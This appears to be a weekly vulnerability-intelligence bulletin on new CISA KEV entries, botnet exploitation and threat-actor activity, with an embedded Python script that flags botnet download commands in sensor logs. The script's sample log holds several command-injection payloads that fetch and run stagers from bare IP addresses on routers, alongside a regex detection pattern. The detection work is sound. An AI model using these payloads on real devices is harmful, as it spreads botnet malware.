This week, the CISA KEV list expanded with 11 new CVEs, four of which are ancient vulnerabilities tied to Adobe Flash Player. Despite being over ten years old, these vulnerabilities (CVE-2014-0497, CVE-2014-0502, CVE-2013-0643, and CVE-2013-0648) have resurfaced with renewed urgency, highlighting a persistent threat that continues to jeopardize security.
Microsoft has confirmed that the spoofing vulnerability CVE-2024-43461, affecting Windows MSHTML, was exploited by the Void Banshee threat actor as part of an attack chain to deliver Atlantida malware. In addition, two older Microsoft CVEs, CVE-2020-0618 and CVE-2019-1069, were also added to the CISA KEV list, highlighting the ongoing security risks associated with outdated software.
Ivanti faced a tough week as two critical vulnerabilities, CVE-2024-8963 and CVE-2024-8190, affecting its Cloud Services Appliance were actively exploited in the wild and added to the CISA KEV list.
The Mirai botnet is ramping up its aggressive exploitation efforts, persistently targeting LB-Link BL devices and TP-Link Archer AX21 routers. Meanwhile, the IoT_Reaper botnet remains operational, continuously taking advantage of an eight-year-old vulnerability in MVPower CCTV DVR models.
Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping defenders make informed prioritization decisions.
CVE-2024-43461
A high-severity spoofing vulnerability in the Windows MSHTML platform, with an EPSS score of 0.16239, has been leveraged by the Void Banshee threat actor group to deploy Atlantida malware. This vulnerability is now on the CISA Known Exploited Vulnerabilities (KEV) list, underscoring its importance and the necessity for prompt mitigation.
CVE-2024-6670
A critical SQL injection vulnerability in WhatsUp Gold, scoring 0.95634 on the EPSS, enables attackers to bypass authentication and access encrypted user passwords without needing credentials. This issue has been included in the CISA Known Exploited Vulnerabilities (KEV) list, highlighting the urgent need for remediation given that a proof-of-concept (PoC) exploit is publicly available.
CVE-2024-27348
Recently added to CISA's Known Exploited Vulnerabilities (KEV) list, this critical flaw in Apache HugeGraph-Server, with a CVSS score of 9.8 and a low EPSS score of 0.0021, enables authenticated attackers to execute arbitrary code on the affected server with SYSTEM privileges.
CVE-2024-8963
A critical path traversal vulnerability in the Ivanti Cloud Services Appliance, with a CVSS score of 9.8, allows remote authenticated attackers to access restricted functionality on vulnerable systems. This vulnerability was recently added to the CISA Known Exploited Vulnerabilities (KEV) list, highlighting its severity.
CVE-2024-8190
A critical OS command injection vulnerability in the Ivanti Cloud Service Appliance, with an EPSS score of 0.15116, permits remote authenticated attackers to execute code remotely. It has also been listed recently in the CISA Known Exploited Vulnerabilities (KEV) catalog.
CVE-2022-21445
A critical remote code execution vulnerability in Oracle JDeveloper, rated CVSS 9.8 with an EPSS score of 0.00705, allows attackers to execute arbitrary code on vulnerable systems. This flaw has been added to the CISA Known Exploited Vulnerabilities (KEV) list for prioritized remediation.
CVE-2020-14644
A critical-impact remote code execution vulnerability in Oracle WebLogic Server, rated CVSS 9.8 with an EPSS score of 0.04636, has been exploited in the wild, allowing attackers to gain full control of affected systems. It has been added to the CISA KEV list for critical response.
CVE-2020-0618
A high-severity remote code execution vulnerability in Microsoft SQL Server, recently added to the CISA KEV list, carries a high EPSS score of 0.97335. It enables attackers to execute arbitrary code within the context of the Report Server service account, posing a significant security risk.
CVE-2019-1069
A high-severity elevation of privilege vulnerability in Microsoft Windows Task Scheduler, with a low EPSS score of 0.00434, was previously exploited by Conti and Ryuk ransomware. This vulnerability has recently been added to the CISA Known Exploited Vulnerabilities (KEV) list, highlighting its continued risk.
CVE-2014-0497, CVE-2014-0502, CVE-2013-0643, and CVE-2013-0648
Persistent high-severity vulnerabilities in Adobe Flash Player, dating back a decade, still pose a serious risk by allowing remote attackers to run arbitrary code on compromised systems. The CISA Known Exploited Vulnerabilities (KEV) list has now been updated to include these vulnerabilities, underscoring the critical need for immediate mitigation.
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
We identify vulnerabilities exploited by botnets, including recent CVEs logged in MISP, and present the top 5 CVEs whose payloads are suggestive of botnet activity, such as wget commands that fetch a stager from a bare IP address.
We proactively monitor the vulnerabilities targeted by adversaries. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The information is sourced from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.
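The "wget with a bare IP address" heuristic above, written out as detection logic. This is an added example, not Loginsoft's own pipeline: the sensor lines, the record format (`src_ip path decoded_payload`) and the documentation-range IPs are all constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample sensor records ("src_ip request_path query_or_body"); not real telemetry.
SAMPLE_LOG = """\
203.0.113.10 /cgi-bin/luci/;stok=/locale form=country&operation=write&country=$(wget+http://198.51.100.7/bin.sh+-O+/tmp/x;sh+/tmp/x)
203.0.113.11 /goform/set_LimitClient_cfg cmd=`curl+http://198.51.100.7/arm7+-o+/tmp/a;chmod+777+/tmp/a;/tmp/a`
203.0.113.12 /shell cd+/tmp;wget+http://192.0.2.55/mirai.mips;chmod+777+mirai.mips;./mirai.mips
203.0.113.13 /login.cgi user=admin&pass=admin
203.0.113.14 /shell cd+/tmp;wget+http://example.org/update.sh
203.0.113.15 /shell cd+/tmp;wget+http://192.0.2.55/mirai.arm7;./mirai.arm7
"""

# A fetch tool followed, on the same line, by a URL whose host is a bare IPv4 literal.
# Downloads from hostnames (line 5) deliberately do not match: the heuristic is "IP, not DNS".
DOWNLOAD_RE = re.compile(r"\b(wget|curl)\b.*?https?://((?:\d{1,3}\.){3}\d{1,3})")

def parse_line(line):
    """Split a sensor record into (src_ip, path, URL-decoded payload); None if malformed."""
    parts = line.split(" ", 2)
    if len(parts) < 2:
        return None
    payload = unquote_plus(parts[2]) if len(parts) == 3 else ""
    return parts[0], parts[1], payload

def find_botnet_downloads(log_text):
    """Return one dict per request whose payload pulls a stager from a raw IP."""
    hits = []
    for raw in log_text.splitlines():
        parsed = parse_line(raw)
        if parsed is None:
            continue
        src, path, payload = parsed
        m = DOWNLOAD_RE.search(payload)
        if m:
            hits.append({"src": src, "path": path, "tool": m.group(1), "host": m.group(2)})
    return hits

def top_targets(hits, n=5):
    """Rank targeted endpoints (the exploited path stands in for the CVE) by hit count."""
    return Counter(h["path"] for h in hits).most_common(n)

def top_hosts(hits, n=5):
    """Rank stager hosts; a host seen across several endpoints is a blocklist candidate."""
    return Counter(h["host"] for h in hits).most_common(n)

if __name__ == "__main__":
    found = find_botnet_downloads(SAMPLE_LOG)
    print(top_targets(found))
    print(top_hosts(found))
```

In a real pipeline the path-to-CVE mapping would come from the sensor's signature set; here the raw path is the grouping key.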
CVE-2024-43461
According to recent findings by The Register, the Void Banshee threat actor exploited this spoofing vulnerability in Windows MSHTML as a zero-day to deploy Atlantida malware. This attack was part of a broader exploit chain that included CVE-2024-38112, another spoofing flaw.
CVE-2023-48788
Recent investigations by Bitdefender revealed that this critical SQL injection vulnerability in Fortinet's EMS systems was exploited by Medusa ransomware to gain initial access.
This category refers to vulnerabilities discovered, and potentially exploited, before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.